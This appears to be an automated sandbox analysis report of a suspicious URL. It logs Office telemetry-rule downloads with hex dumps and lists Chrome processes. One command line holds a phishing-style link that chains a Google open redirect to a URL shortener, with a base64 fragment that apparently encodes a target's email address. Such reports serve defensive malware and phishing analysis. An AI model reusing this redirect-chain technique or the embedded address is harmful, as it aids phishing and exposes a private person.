                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          84192.168.2.44983813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:28:07 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-03 02:28:07 UTC470INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:28:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 468
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                          ETag: "0x8DC582BB3EAF226"
                                                          x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241203T022807Z-174f7845968kdththC1EWRzvxn0000000hr00000000059zz
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-03 02:28:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:21:26:37
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:21:26:42
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2112,i,7279134031412349882,5807614572286782813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:21:26:48
                                                          Start date:02/12/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t"
                                                          Imagebase:0x7ff76e190000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          No disassembly